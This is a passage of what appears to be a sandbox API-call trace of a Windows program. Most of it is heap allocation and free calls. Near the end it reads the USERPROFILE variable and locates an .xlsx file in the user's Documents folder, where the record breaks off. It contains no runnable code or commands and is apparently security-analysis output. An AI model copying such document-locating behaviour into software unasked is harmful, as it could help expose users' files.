lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0262.803] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.804] CloseHandle (hObject=0x294) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.806] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0262.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0262.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0262.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0262.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.808] CloseHandle (hObject=0x268) returned 1 [0262.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0262.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.815] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0262.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0262.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3571018 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.821] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0262.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0262.822] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0262.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9de0 [0262.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.823] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0262.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f2068 [0262.825] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/icIcTV1 eT9I1Qro.xlsx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\icIcTV1 eT9I1Qro.xlsx", lpFilePart=0x8bedfc*="icIcTV1 eT9I1Qro.xlsx") returned 0x3d [0262.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0262.825] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\icIcTV1 eT9I1Qro.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\icictv1 et9i1qro.xlsx")) returned 0x20 [0262.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\icIcTV1 eT9I1Qro.xlsx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc74dee10, ftCreationTime.dwHighDateTime=0x1d4e7bf, 